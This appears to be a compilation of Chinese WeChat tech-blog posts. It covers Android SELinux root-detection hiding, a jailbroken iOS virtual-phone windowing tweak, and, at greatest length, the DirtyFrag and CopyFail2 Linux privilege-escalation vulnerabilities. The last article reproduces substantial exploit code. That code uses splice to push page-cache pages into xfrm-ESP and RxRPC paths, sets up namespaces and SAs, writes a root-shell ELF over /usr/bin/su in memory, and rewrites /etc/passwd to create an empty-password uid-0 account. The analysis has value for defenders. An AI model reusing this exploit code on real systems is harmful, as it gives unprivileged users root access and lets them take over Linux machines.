若运行期间策略以外部方式被合法更新（例如系统OTA后init重新加载policy），before_security_load_policy会把这次load标记为g_dirty_policy_seen=true，从此snapshot_clean_policy不再刷新副本。这虽然能避免把脏策略当成干净副本，但也意味着干净blob会一直停留在最早那次快照的版本，长期运行后可能与系统真实策略产生越来越大的偏差，进而拦截到一些本应放行的合法上下文。

总之一句话，目前kpm的实现还有一些提升的空间，期待后续的完善。

最后，希望APatch快快提供代码方式来补丁，这样就不用折腾插件了。

总结

Duck与DirtySepolicy的检测点都依赖app_zygote所拥有的SELinux查询能力。一边用/sys/fs/selinux/context询问上下文是否存在，另一边用checkSELinuxAccess询问访问是否放行，两者皆从策略层一举绕开包名隐藏、进程名隐藏与文件路径伪装。

KernelSU上游的selinux_hide，处理面已覆盖SEL_CONTEXT、SEL_ACCESS与setprocattr current，对当前Duck和DirtySepolicy的检测路径而言已经具备过检测能力。Andrea的内核源码补丁则把同一思路落到services.c之中，对定制内核而言更为直接，无需依赖运行时对write_op的patch。

至于Magisk，目前在其官方公开代码中尚未见到同级别的app_zygote策略查询隐藏层。只要目标设备仍然把magisk或magisk_file暴露在当前策略之中，Duck的上下文检测以及DirtySepolicy式的访问检测，仍会轻易命中。

若未启用任何隐藏措施，ksu、ksu_file、magisk、magisk_file、lsposed_file这些类型都会被策略oracle一一读出。一旦开启KernelSU的selinux_hide，或将源码级隐藏补丁合入内核，检测器虽然仍在调用同一份API，但返回值已经接近一份干净策略，命中率自然随之下降。

参考资料

Duck-Detector
PR#22：https://github.com/eltavine/Duck-Detector-Refactoring/pull/22
Duck-Detector
最新实现：app/src/main/cpp/selinux/context_validity_probe.cpp
Duck-Detector
预加载：app/src/main/java/com/eltavine/duckdetector/features/selinux/data/service/AppZygotePreload.kt
Duck-Detector
LSPosed信号：app/src/main/java/com/eltavine/duckdetector/features/lsposed/data/probes/LSPosedDirtyPolicyProbe.kt
DirtySepolicy
：https://github.com/LSPosed/DirtySepolicy
DirtySepolicy
核心实现：app/src/main/java/org/lsposed/dirtysepolicy/AppZygote.java
AOSPapp_zygote.te：https://android.googlesource.com/platform/system/sepolicy/+/master/private/app_zygote.te
KernelSUselinux_hide：kernel/feature/selinux_hide.c
KernelSUbackup_sepolicy：kernel/selinux/rules.c
KernelSU功能开关：uapi/feature.h、manager/app/src/main/cpp/ksu.cc
Andrea内核源码级补丁：https://github.com/Andrea-lyz/oppo_oplus_realme_sm8750/commit/db4883d7d243a9fc6ed8ea4071acce2e0be7b460
Andrea补丁文件：other_patch/70_selinux_hide_policy_query.patch
APatch KPM样例还原：kpms/selinux_hook/selinux_hook.c（基于selinux_magisk_access_filter v1.0.4反编译还原）
KPM框架hook_wrap接口：kpms/kpm/kernel/include/hook.h
Magiskmagiskpolicy说明：https://github.com/topjohnwu/Magisk/blob/master/docs/tools.md

跳转微信打开

iOS虚拟手机可以玩窗口化融合的越狱插件

Sat, 09 May 2026 12:11:00 +0800

原创非虫 2026-05-09 12:11 湖北

iOS虚拟手机可以玩窗口化融合的越狱插件

上一篇《iOS虚拟手机实现能力现状》已经把虚拟手机能跑、能装、能控、能切换环境这几件事讲清楚了。既然底座已经能稳定越狱、能保留状态、还能做自动化。所有的准备工作做好后，下一步要问的，肯定就是有什么好玩的插件？怎么给虚拟手机安装越狱插件？不要急，这一篇就讲这个。

本篇介绍的MilkyWayReborn是iOS上一个集多窗口和窗口缩放能力于一体的越狱tweak。它支持在同一块屏幕上，可以同时打开多个App窗口，而不是只能在虚拟手机屏幕的前台、后台和分屏之间来回切换。

顺便提一嘴，安卓设备现在也有了类似的工具，有机会我也会在后面的公众号文章中介绍，大家拭目以待吧。

项目介绍

先看仓库本身。

https://github.com/34306/MilkyWayReborn

这个仓库是一个越狱插件，包名是com.milkyway.reborn。仓库文档描述它是一个用于在同一屏幕上同时使用多个App的多任务tweak。查看它的control文件，定义是给iOS18和26用的窗口化多任务插件，也是MilkyWay2的现代重写版。这个版本范围对于安卓研究设备的版本号来说，够宽泛也够用了。

从工程结构看，它是典型的rootless的Theos包，Makefile里明确写了THEOS_PACKAGE_SCHEME = rootless，目标架构是arm64和arm64e。这意味着它不是传统老式越狱时代那种随便往系统目录里塞文件的玩法，而是按现代rootless越狱的布局来做的。

功能源码主干由这几个模块组成：

Tweak.x
：负责hook系统和场景流程。
MWWindowView.m
：负责窗口外壳、按钮和拖拽缩放。
MWBackgrounderManager
：负责管理哪些App要保持前台状态。
MWSceneHelper
：负责场景唤醒、休眠和查找。
MWPassthroughWindow
：负责把内容挂到合适的透传窗口里。
MWThemeManager
：负责窗口样式和控件外观。

基本能看出，它是直接插进SpringBoard和Scene系统里，把App变成可以拖来拖去的窗口。

iOS虚拟手机越狱

要让这个插件跑起来，前提不是安装包，而是先把iOS虚拟手机搞成越狱状态。

在前一篇文章里，iOS虚拟手机的越狱路线已经讲过了，核心思路就是走vphone-cli的Jailbreak变体，而不是在系统起来以后再单独找一套传统越狱方案。这个路线会把系统、启动链、用户态工具和bootstrap一起准备好，最后给你一个已经具备/var/jb布局、能装包、能加载Substrate插件的虚拟iPhone。

如果你沿用前一篇的虚拟手机构建链，通常就是直接选JB=1这条路：

make setup_machine JB=1

简单的讲，虚拟手机越狱后，在安装插件之前，先确认这几件事：

Sileo
或者等价的包管理器能正常打开。
mobilesubstrate
已经在系统里。
/var/jb
存在，说明是rootless布局。
SpringBoard重启后不会把越狱环境打回原形。
你能在虚拟机里装一个最简单的tweak并让它生效。

如果这几步没问题，说明虚拟手机已经具备安装MilkyWayReborn的基础条件了。

安装越狱插件

MilkyWayReborn的安装方式很标准，就是越狱插件的那一套。因为它依赖mobilesubstrate，所以本质上是一个要被注入SpringBoard和目标App的动态tweak。

make package先生成.deb包。然后把编译好的包通过SSH丢进虚拟手机，接着使用Sileo或者dpkg -i安装，装完后respring一次，让SpringBoard重新加载注入链。对于rootless环境来说，这种方式最稳。

安装完成后，重启一次SpringBoard。再用一个简单App测试，长按图标菜单里有没有Open in Window。如果这个入口出现了，说明插件已经注入成功了。

App窗口化技术

MilkyWayReborn的核心不是“加个小浮窗”，而是把一个App真的变成窗口。

它在主屏图标上挂了一个快捷动作，名字就是Open in Window。也就是说，你长按某个App图标时，不只是打开或者卸载，还能直接让这个App以窗口形态启动。这个入口很适合iOS虚拟手机，因为虚拟手机本来就强调可重复、可自动化的操作流程，少一次手动切换，体验就完整很多。

窗口本体也做得很完整。MWWindowView里能看到标题栏、关闭按钮、最小化按钮、最大化按钮和右下角缩放手柄。窗口可以拖动，缩放手柄可以拖拽改变大小，双击缩放手柄可以把窗口恢复到内容视图的原始比例，长按缩放手柄还会按当前设备方向做一次旋转校正。

插件最难的部分，不是画窗口，而是让窗口里的App别被系统赶回后台。MilkyWayReborn在这里下了很重的功夫。源码里能看到它对FBScene、UIMutableApplicationSceneSettings、_UISceneHostingActivationStateHostComponent和SBApplication都做了处理，目标很明确：只要这个App被标记为窗口化，就尽量维持它的foreground状态，避免Scene系统和RunningBoard把它当成普通后台应用处理掉。

更具体一点，它会做这些事：

记录需要保持前台的bundle ID和scene ID。
在场景更新时强制foreground。
在deactivationReasons变化时把退出理由压住。
在应用退出时清理状态，但不让残留assertion拖垮系统。
通过RBSAssertion和BKSProcessAssertion维持进程活性。
必要时再做一次task_resume或者SIGCONT补救。

Tweak.x里有一个很关键的入口：它会从图标快捷菜单启动目标App，等Scene真正起来以后，再把Scene包进MWWindowView，最后挂到主机窗口上。这样一来，多个App都可以各自拥有自己的窗口外壳，互不遮挡时就像并排桌面窗口，叠起来时又能靠拖拽切换前后层级。

MWBackgrounderManager在这里也很关键，它专门维护哪些bundle ID和scene ID应该被视为foreground。换句话说，这不是单个窗口的静态UI，而是一套可以持续追踪多个App状态的管理器。

这也是为什么它在iOS虚拟手机上特别合适。虚拟手机本来就适合反复回滚、反复验证和批量测试，一旦再加上这种窗口化能力，很多原本要来回切App的操作，就可以在一屏里完成。

总结

MilkyWayReborn不是系统级分屏方案，它是越狱插件，靠的是Scene、SpringBoard和私有API。换系统版本以后，相关hook点很容易漂移出现不兼容的问题。

另外，它依赖mobilesubstrate和rootless越狱布局。如果虚拟手机没越狱，或者bootstrap不完整，插件都不会起来。

还有一点很重要：它追求的是窗口化体验，不是多开沙盒隔离。也就是说，App本身的数据边界和系统限制并没有被重写，只是交互形态被改了。这个区别要分清，不然很容易把“窗口化”误解成“多开”。

如果把iOS虚拟手机看成一台研究机，那么MilkyWayReborn做的事情，就是给这台研究机补上一层桌面化交互能力。但关于App控制的玩法远不止如此，相信后面社区还会有更多这样优秀的插件诞生。

前一篇文章讲了“虚拟手机能不能稳定跑起来，能不能越狱，能不能自动化”。这一篇讲的是“既然能跑起来，能不能把它变成一台可以同时跑多个App的窗口机器”。那下一篇讲什么好呢？

最后，抛出一个问题：既然能控制App的启动与窗口化，那是否可以实现安卓系统上那样的“多开”功能？欢迎大家在评论区讨论。

阅读原文

跳转微信打开

最近是怎么了？又一款通杀全线Linux发行版的0Day漏洞

Fri, 08 May 2026 09:48:00 +0800

原创非虫 2026-05-08 09:48 湖北

又一款通杀全线Linux发行版的0Day漏洞

2026年5月7日，又一个Linux本地提权洞公开了，名字叫DirtyFrag。

仓库地址是：https://github.com/V4bel/dirtyfrag

这个漏洞不是靠单个入口覆盖所有环境，而是把两个同类页缓存写问题串到了一起。第一条链路走xfrm-ESP，能拿到4字节页缓存写；第二条链路走RxRPC，写入值不如ESP自由，但不依赖用户命名空间。两个入口互相补盲区，所以仓库里把它称为Universal Linux LPE。

截至2026年5月8日，仓库说明里还没有统一CVE编号。ESP分支已有netdev树补丁，RxRPC分支也有公开补丁邮件，但发行版是否回补仍然要看各自公告。

背景

DirtyFrag属于DirtyPipe、CopyFail这一类问题：攻击者没有目标文件的写权限，却能让内核在页缓存上写入数据。这里的关键点不是磁盘文件被直接写了，而是PageCache里的那一页被改了。后续进程读这个文件时，读到的就是被污染后的内存副本，直到缓存被丢弃或系统重启。

DirtyPipe污染的是struct pipe_buffer，DirtyFrag污染的是struct sk_buff里的frag。名字里的Frag就是这个意思。

从影响时间看，仓库README给出的跨度很长。xfrm-ESP分支从2017年1月17日的cac2661c53f3开始受影响，RxRPC分支从2023年6月的2dc334f1a63a开始受影响。两条链合起来，漏洞有效生命周期接近9年。

它的共同入口可以拆成三步：

攻击者只读打开目标文件，比如/usr/bin/su或/etc/passwd。
通过splice()把目标文件的页缓存页零拷贝塞进网络发送侧skb->frags[]。
接收侧内核代码认为自己只是在原地做解密校验，结果把解密过程中的STORE写到了攻击者塞进来的页缓存页上。

抽象成路径就是：

只读文件PageCache
	被splice引用到pipe
	被splice发送到socket
	进入skb->frags[]
	接收侧原地解密
	解密过程对frag执行STORE
	PageCache被改写

关键点在写入和失败返回的顺序：认证失败发生在写入之后。攻击者不需要知道真正的认证密钥，只要能让内核走到原地解密路径，STORE已经发生了，后面的-EBADMSG或-EPROTO只是在写完之后返回的错误码。

从CopyFail到CopyFail2

之前那篇文章分析的是CopyFail，也就是CVE-2026-31431。那条链的核心在AF_ALG，攻击者通过splice(file->pipe->AF_ALG)把只读文件的PageCache页带进内核加密路径，再利用algif_aead状态机和原地解密写回，让内核把数据写到页缓存里。

后来出现的Copy_Fail2-Electric_Boogaloo沿用了这个方向，但落点换到了网络协议栈。仓库地址是：https://github.com/0xdeadbeefnetwork/Copy_Fail2-Electric_Boogaloo

它名字叫CopyFail2，但漏洞入口已经不再是AF_ALG状态机，而是xfrm ESP-in-UDP的MSG_SPLICE_PAGES无COW快路径。换句话说，它和CopyFail同属“只读PageCache被内核写回”的大类，但具体子系统已经切到XFRM/ESP，也就是DirtyFrag里ESP分支的核心位置。

这里的no-COW fast path就是本文后面要讲的esp_input()跳过skb_cow_data()路径。MSG_SPLICE_PAGES则是UDP发送侧把pipe里的页直接挂到skb->frags[]，让目标文件PageCache以网络包frag的身份进入ESP接收路径。

从仓库测试结果看，它覆盖Ubuntu24.04、Debian13、Arch、Fedora43、Ubuntu26.04等较新的内核；Ubuntu22.04的5.15内核不在它的触发范围内，因为UDP侧MSG_SPLICE_PAGES支持是在6.5之后进入的。

CopyFail2和DirtyFrag ESP分支的差异主要在利用策略。

DirtyFrag ESP分支利用ESN的seq_hi做4字节可控STORE，直接把/usr/bin/su第一页换成192字节root-shellELF。CopyFail2走rfc4106(gcm(aes))，目标换成/etc/passwd里一条无登录用户行，逐字节改成空密码uid0用户。中间填充字节用于保持原始行长度不变：

sick::0:0:XXXXXXXXXXXXXXXX:/:/bin/bash

逐字节改写靠的是GCM的计数器流。CopyFail2先读出目标文件某个字节C，再指定想要的明文字节P，需要的keystream字节就是：

keystream = C ^ P

PoC里对应的逻辑如下：

unsignedchar tbyte;
pread(tfd, &tbyte, 1, tboff);
unsignedchar want_ks = tbyte ^ want_plain;
for (ivv = 1; ivv < (1ULL<<32); ivv++) {
memcpy(IV, &ivv, IVLEN);
memcpy(nonce + SALT_LEN, IV, IVLEN);
	aes_gcm_keystream_byte(AEAD_KEY, nonce, 0, &ks_byte);
if (ks_byte == want_ks)
break;
}

这里没有爆破密钥。AEADkey固定，变化的是IV；只要第0个keystream字节等于want_ks，ESP解密时目标文件原字节C和keystream异或后，就会得到想要的P。

接着它通过ip xfrm state add注册ESP状态，算法是rfc4106(gcm(aes))：

snprintf(cmd, sizeof cmd,
"ip link set lo up ; "
"ip xfrm state flush ; "
"ip xfrm state add src 127.0.0.1 dst 127.0.0.1 "
"proto esp spi 0x%08x "
"encap espinudp %d %d 0.0.0.0 "
"aead 'rfc4106(gcm(aes))' %s 128 "
"replay-window 32",
	SPI, ENC_PORT, ENC_PORT, keyhex);

这里依然需要XFRM配置能力，所以它会运行在user和net命名空间中。仓库还提供了aa-rootns.c，用于在特定Ubuntu策略下尝试拿到命名空间内所需能力。这个点比原始CopyFail更贴近真实发行版环境：漏洞触发之外，还要处理user namespace策略。

把目标页送进ESP路径的代码集中在三次splice()和一次splice(pipe->socket)：

splice(afd2, &off, pfd[1], NULL, 16, SPLICE_F_MORE);
splice(tfd, &toff, pfd[1], NULL, 1, SPLICE_F_MORE);
splice(afd2, &ioff, pfd[1], NULL, 16, SPLICE_F_MORE);
int ss = socket(AF_INET, SOCK_DGRAM, 0);
connect(ss, (struct sockaddr *)&da, sizeof da);
splice(pfd[0], NULL, ss, NULL, 16 + 1 + 16, 0);

前三次splice()分别塞入ESP头、目标文件的1字节PageCache、伪ICV。最后一次splice(pipe->UDPsocket)让内核设置MSG_SPLICE_PAGES，这1字节目标文件页就会作为skb->frags[]进入ESP接收路径。

外层run.sh负责把“单字节写”扩展成“整行替换”。它先找/etc/passwd里最长的nologin、false或sync用户行，然后构造同长度的新行，避免破坏文件结构。

PREFIX="${NEW_USER}::0:0:"
SUFFIX=":/:/bin/bash"
PAD_LEN=$((VICTIM_LEN - ${#PREFIX} - ${#SUFFIX}))
PAD=$(printf'%*s'"$PAD_LEN"'' | tr' ''X')
TARGET_LINE="${PREFIX}${PAD}${SUFFIX}"

然后逐字节比较原始行和目标行，只对不同字节调用底层写原语：

for ((i=0; ido
	o="${src:$i:1}"
	t="${dst:$i:1}"
if [ "$o" != "$t" ]; then
		FLIPS+=("$((line_off + i)):$(printf '0x%02x' "'$t")")
fi
done

这种写法不改行长，不移动后续字段偏移。页缓存里出现空密码uid0用户后，再通过su进入它。

CopyFail2还补了IPv6版本。README中特别强调同类问题也能落到esp6_input()，IPv6PoC使用::1回环和ip -6 xfrm，并且多塞了16字节padding，因为xfrm6_input.c存在长度检查，UDPpayload至少要达到40字节。需要注意的是，当前能查到的netdev修复提交f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4已经同时修改了esp4.c、esp6.c、ip_output.c和ip6_output.c；如果某个发行版只回补了IPv4侧修复，IPv6侧才会继续成为绕过面。

if (splice(afd2, &off, pfd[1], NULL, 16, SPLICE_F_MORE) != 16)
	die("splice esp_hdr");
if (splice(tfd, &toff, pfd[1], NULL, 1, SPLICE_F_MORE) != 1)
	die("splice target byte");
if (splice(afd2, &poff, pfd[1], NULL, 16, SPLICE_F_MORE) != 16)
	die("splice pad");
if (splice(afd2, &ioff, pfd[1], NULL, 16, SPLICE_F_MORE) != 16)
	die("splice icv");

三者关系可以压成下面这张表：

CopyFail：
	AF_ALG状态机问题，PageCache进入加密socket后被写回
CopyFail2：
	xfrm ESP-in-UDP无COW快路径，PageCache进入skb->frag后被ESP写回
DirtyFrag：
	把xfrm-ESP Page-Cache Write和RxRPC Page-Cache Write串联
	用两条链覆盖不同发行版策略与模块差异

CopyFail2可以理解为CopyFail思路迁移到XFRM/ESP后的版本；从根因看，它已经踩在DirtyFrag ESP分支的同一位置，只是payload组织方式不同。

xfrm-ESP漏洞原理

先看ESP这条链。问题出在esp_input()处理非线性skb时跳过了skb_cow_data()。

正常情况下，如果skb的数据来自外部共享页，内核在原地修改之前应该先做copy-on-write，复制到内核自己的私有buffer里。但漏洞分支里只要skb没有被clone，并且没有frag_list，就直接goto skip_cow。

staticintesp_input(struct xfrm_state *x, struct sk_buff *skb)
{
if (!skb_cloned(skb)) {
if (!skb_is_nonlinear(skb)) {
			nfrags = 1;
goto skip_cow;
		} elseif (!skb_has_frag_list(skb)) {
			nfrags = skb_shinfo(skb)->nr_frags;
			nfrags++;
goto skip_cow;
		}
	}
	err = skb_cow_data(skb, 0, &trailer);
}

问题就藏在第二个分支里。通过splice()发出去的文件页会挂在skb_shinfo(skb)->frags[]，这是非线性skb，但它通常没有frag_list。于是esp_input()绕过了COW，后续加解密直接在这个页缓存页上操作。

接下来看写入位置。ESP配合ESN和authencesn(hmac(sha256),cbc(aes))时，会在crypto_authenc_esn_decrypt()里移动高32位序列号。这个移动不是纯逻辑移动，而是一次真实写入。

staticintcrypto_authenc_esn_decrypt(struct aead_request *req)
{
	scatterwalk_map_and_copy(tmp, src, 0, 8, 0);
if (src == dst) {
		scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
		scatterwalk_map_and_copy(tmp + 1, dst,
			assoclen + cryptlen, 4, 1);
		dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
	}
}

scatterwalk_map_and_copy(...,1)表示向目标scatterlist写数据。因为前面aead_request_set_crypt(req,sg,sg,...)让src和dst指向同一批sg，所以这里写的不是普通临时buffer，而是skb->frags[]背后的PageCache。

ESP分支最终得到的是一次稳定的4字节STORE。

这4字节的值来自ESN高32位序列号，而这个字段可由攻击者在SA里提前放好：

staticvoidesp_input_set_header(struct sk_buff *skb, __be32 *seqhi)
{
structxfrm_state *x = xfrm_input_state(skb);
structip_esp_hdr *esph;
if ((x->props.flags & XFRM_STATE_ESN)) {
		esph = skb_push(skb, 4);
		*seqhi = esph->spi;
		esph->spi = esph->seq_no;
		esph->seq_no = XFRM_SKB_CB(skb)->seq.input.hi;
	}
}

XFRM_SKB_CB(skb)->seq.input.hi最终来自XFRM状态里的replay_esn->seq_hi。而这个值是在注册SA时通过XFRMA_REPLAY_ESN_VAL属性传进去的。PoC正是把要写入的4字节payload塞到这里。

ESP路径代码块解析

PoC把目标选成/usr/bin/su，因为它本来就是setuid-root程序。把su的PageCache第一页临时换成极小的root-shellELF后，再执行/usr/bin/su，内核加载的是被污染后的ELF内容，setuid位仍然生效。

目标和payload相关宏只有几个：

#define TARGET_PATH      "/usr/bin/su"
#define PATCH_OFFSET     0
#define PAYLOAD_LEN      192
#define ENTRY_OFFSET     0x78

源码里的shell_elf[PAYLOAD_LEN]是一段192字节ELF。这里不是把payload写进磁盘上的/usr/bin/su，而是覆盖/usr/bin/su的PageCache前192字节。ENTRY_OFFSET处是新ELF入口，里面做setgid(0)、setuid(0)、setgroups(0,NULL)，最后execve("/bin/sh",...)。

ESP需要注册XFRM SA，这要求CAP_NET_ADMIN。普通用户没有这个权限，所以PoC先进入新的user和net命名空间：

staticvoidsetup_userns_netns(void)
{
uid_t real_uid = getuid();
gid_t real_gid = getgid();
charmap[64];
	unshare(CLONE_NEWUSER | CLONE_NEWNET);
	write_proc("/proc/self/setgroups", "deny");
snprintf(map, sizeof(map), "0 %u 1", real_uid);
	write_proc("/proc/self/uid_map", map);
snprintf(map, sizeof(map), "0 %u 1", real_gid);
	write_proc("/proc/self/gid_map", map);
int s = socket(AF_INET, SOCK_DGRAM, 0);
structifreqifr;memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
	ioctl(s, SIOCGIFFLAGS, &ifr);
	ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
	ioctl(s, SIOCSIFFLAGS, &ifr);
}

这段代码的目的不是直接拿宿主root，而是在新命名空间里获得配置XFRM所需的网络管理能力，并把lo接口拉起来。后面所有包都打到127.0.0.1:4500。

接着是注册SA，关键字段是seq_hi：

staticintadd_xfrm_sa(uint32_t spi, uint32_t patch_seqhi)
{
structxfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
	xs->id.spi = htonl(spi);
	xs->id.proto = IPPROTO_ESP;
	xs->family = AF_INET;
	xs->mode = XFRM_MODE_TRANSPORT;
	xs->flags = XFRM_STATE_ESN;
structxfrm_replay_state_esn *esn =
		(struct xfrm_replay_state_esn *)esn_buf;
	esn->bmp_len = 1;
	esn->seq = REPLAY_SEQ;
	esn->seq_hi = patch_seqhi;
	esn->replay_window = 32;
	put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf));
}

patch_seqhi就是最终会被STORE到目标页缓存里的4字节。PoC按4字节切分shell_elf，每4字节注册一个SPI不同的SA。

for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
uint32_t spi = 0xDEADBE10 + i;
uint32_t seqhi =
		((uint32_t)shell_elf[i*4 + 0] << 24) |
		((uint32_t)shell_elf[i*4 + 1] << 16) |
		((uint32_t)shell_elf[i*4 + 2] << 8) |
		((uint32_t)shell_elf[i*4 + 3]);
	add_xfrm_sa(spi, seqhi);
}

这个循环把“要写入的4字节”转换成“XFRM状态里的ESN高32位”。后续每触发一次指定SPI的ESP包，就在对应文件偏移写4字节。

do_one_write()里和页缓存写有关的是下面几行：

uint8_t hdr[24];
*(uint32_t *)(hdr + 0) = htonl(spi);
*(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);
memset(hdr + 8, 0xCC, 16);
structioveciov_h = { .iov_base = hdr, .iov_len = sizeof(hdr) };
vmsplice(pfd[1], &iov_h, 1, 0);
splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);
splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);

前置的socket设置决定这批数据会进入ESP接收路径：

setsockopt(...,UDP_ENCAP_ESPINUDP,...)
会让UDP接收路径进入ESP-in-UDP处理逻辑，包会被送到xfrm4_udp_encap_rcv()，再进入esp_input()。
vmsplice()
先把伪造ESP头放入pipe，splice(file_fd,...)再把目标文件页缓存挂入pipe，最后splice(pipe,socket,...)把它们送进UDPsocket。由于走零拷贝路径，目标文件页以skb->frags[0]形态到达接收侧。

最终接收侧看到的skb大概是这样：

skb {
	head: ESP头8字节，IV16字节
	frags[0]: PageCache页P，偏移i*4，长度16字节
}

而漏洞写入发生在接收侧：

udp_rcv
	xfrm4_udp_encap_rcv
		xfrm_input
			esp_input
				跳过skb_cow_data
				esp_input_set_header写入seq_hi
				skb_to_sgvec把frag映射到sg
				crypto_authenc_esn_decrypt
					scatterwalk_map_and_copy写4字节到PageCache

ESP路径没有竞争窗口，不靠抢时序。只要包走到这条分支，页缓存页就会出现在原地解密的写入位置。

RxRPC漏洞原理

ESP路径写入能力更强，但它有一个现实问题：需要unshare(CLONE_NEWUSER|CLONE_NEWNET)。Ubuntu近年可能通过AppArmor策略限制非特权用户创建user namespace，这会让ESP路径起不来。

针对这个盲区，DirtyFrag接上了RxRPC路径。

RxRPC分支的问题点在rxkad_verify_packet_1()。它为了校验RXRPC_SECURITY_AUTH级别的数据包，会对skb里的前8字节payload做一次原地pcbc(fcrypt)解密。

staticintrxkad_verify_packet_1(struct rxrpc_call *call,
struct sk_buff *skb, rxrpc_seq_t seq,
struct skcipher_request *req){
	sg_init_table(sg, ARRAY_SIZE(sg));
	ret = skb_to_sgvec(skb, sg, sp->offset, 8);
if (unlikely(ret < 0))
return ret;
memset(&iv, 0, sizeof(iv));
	skcipher_request_set_sync_tfm(req, call->conn->rxkad.cipher);
	skcipher_request_set_callback(req, 0, NULL, NULL);
	skcipher_request_set_crypt(req, sg, sg, 8, iv.x);
	ret = crypto_skcipher_decrypt(req);
}

这里的sg,sg说明源和目的相同。只要攻击者能通过splice()把目标文件页塞进skb->frags[]，skb_to_sgvec()就会把这个页缓存页映射成scatterlist，后面的crypto_skcipher_decrypt()就会在页缓存上做8字节STORE。

但RxRPC和ESP不一样。ESP写入值来自seq_hi，几乎可以当任意4字节写。RxRPC写入值是：

P = fcrypt_decrypt(C,K)

其中C是当前位置原本的8字节内容，K是攻击者通过RxRPCkey控制的8字节session key。攻击者不能直接指定P，只能离线爆破K，直到解密结果满足目标格式。

所以RxRPC路径不适合像ESP那样写完整ELF。PoC换了一个更省字节的目标：/etc/passwd第一行。

正常root行类似：

root:x:0:0:root:/root:/bin/bash

PoC要把它改成：

root::0:0:GGGGGG:/root:/bin/bash

也就是把root的密码字段变成空字符串。在PoC针对的Ubuntu等PAM配置中，pam_unix.so nullok会接受空密码字段，su认证就能被绕过去。

RxRPC路径代码块解析

RxRPC的第一步是准备攻击者控制的session key。PoC构造RxRPCv1token，把SESSION_KEY塞进去，再用add_key()注册到当前进程keyring。

staticuint8_t SESSION_KEY[8] = {
0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
};
staticintbuild_rxrpc_v1_token(uint8_t *out, size_t maxlen)
{
	*(uint32_t *)p = htonl(2);
	*(uint32_t *)p = htonl(0);
	*(uint32_t *)p = htonl(1);
memcpy(p, SESSION_KEY, 8);
}
staticlongadd_rxrpc_key(constchar *desc)
{
return key_add("rxrpc", desc, buf, n, KEY_SPEC_PROCESS_KEYRING);
}

sec_ix=2表示RXKAD。内核后面建立安全上下文时，会用这个session key初始化pcbc(fcrypt)cipher。

接着PoC在用户态复刻了fcrypt，做离线搜索。它没有尝试约束完整8字节，因为那样代价太高，而是只约束最终/etc/passwd格式必须成立的字节。

staticinlineintfc_check_pa_nullok(constuint8_t P[8])
{
return P[0] == ':' && P[1] == ':';
}
staticinlineintfc_check_pb_nullok(constuint8_t P[8])
{
return P[0] == '0' && P[1] == ':';
}
staticinlineintfc_check_pc_nullok(constuint8_t P[8])
{
if (P[0] != '0') return0;
if (P[1] != ':') return0;
if (P[7] != ':') return0;
for (int i = 2; i < 7; i++) {
if (P[i] == ':' || P[i] == '\0' || P[i] == '\n')
return0;
	}
return1;
}

这三个谓词对应三次重叠写：

offset4写8字节，最终只保留第0到第1字节，目标是::
offset6写8字节，最终只保留第0到第1字节，目标是0:
offset8写8字节，最终保留全部8字节，目标是0:任意合法5字节:

因为三次写入区域重叠，后写覆盖先写，最后效果是：

root:x:0:0:root:/root:/bin/bash
root::0:0:GGGGGG:/root:/bin/bash

离线搜索函数保留了最小循环：

staticintfind_K_offline_generic(constuint8_t C[8],
uint64_t max_iters, pcheck_fn check,
uint8_t K_out[8], uint8_t P_out[8],
uint64_t seed_init, constchar *label){
for (uint64_t iter = 0; iter < max_iters; iter++) {
uint64_t r = fc_splitmix64(&seed);
memcpy(K, &r, 8);
		fcrypt_user_setkey(&ctx, K);
		fcrypt_user_decrypt(&ctx, P, C);
if (check(P)) {
memcpy(K_out, K, 8);
memcpy(P_out, P, 8);
return0;
		}
	}
return-1;
}

这个函数完全在用户态跑，不触发内核漏洞。它只是找一个合适的K，让fcrypt_decrypt(C,K)的输出满足passwd行格式。

第二次和第三次搜索不能直接使用原始文件字节。第一次写入之后，offset6开始的8字节已经变了；第二次写入之后，offset8开始的8字节也变了。PoC专门修正了这个链式关系：

find_K_offline_generic(Ca, max_iters,
	fc_check_pa_nullok, Ka, Pa_out, seed_base, "K_A");
memcpy(Cb_actual, Pa_out + 2, 6);
memcpy(Cb_actual + 6, Cb + 6, 2);
find_K_offline_generic(Cb_actual, max_iters,
	fc_check_pb_nullok, Kb, Pb_out, seed_base, "K_B");
memcpy(Cc_actual, Pb_out + 2, 6);
memcpy(Cc_actual + 6, Cc + 6, 2);
find_K_offline_generic(Cc_actual, max_iters,
	fc_check_pc_nullok, Kc, Pc_out, seed_base, "K_C");

如果这里不修正Cb_actual和Cc_actual，离线算出来的key在真实内核触发时就会错位。RxRPC分支能稳定落点，靠的就是这处链式修正。

内核写入由do_one_trigger()触发。握手和CHALLENGE部分只负责让客户端建立RXKAD上下文，页缓存写入集中在构造DATA头和splice()发送这一段：

long key = add_rxrpc_key(keyname);
compute_csum_iv(epoch, cid, 2, SESSION_KEY, csum_iv);
compute_cksum(cid, callN, 1, SESSION_KEY, csum_iv, &cksum_h);
structrxrpc_wire_headermal = {0};
mal.epoch = htonl(epoch);
mal.cid = htonl(cid);
mal.callNumber = htonl(callN);
mal.seq = htonl(1);
mal.type = RXRPC_PACKET_TYPE_DATA;
mal.flags = RXRPC_LAST_PACKET;
mal.securityIndex = 2;
mal.cksum = htons(cksum_h);
mal.serviceId = htons(svc_in);
structiovecviv = { .iov_base = &mal, .iov_len = sizeof(mal) };
vmsplice(p[1], &viv, 1, 0);
splice(target_fd, &off, p[1], NULL, splice_len, SPLICE_F_NONBLOCK);
splice(p[0], NULL, udp_srv, NULL, sizeof(mal) + splice_len, 0);
recvmsg(rxsk_cli, &m, 0);

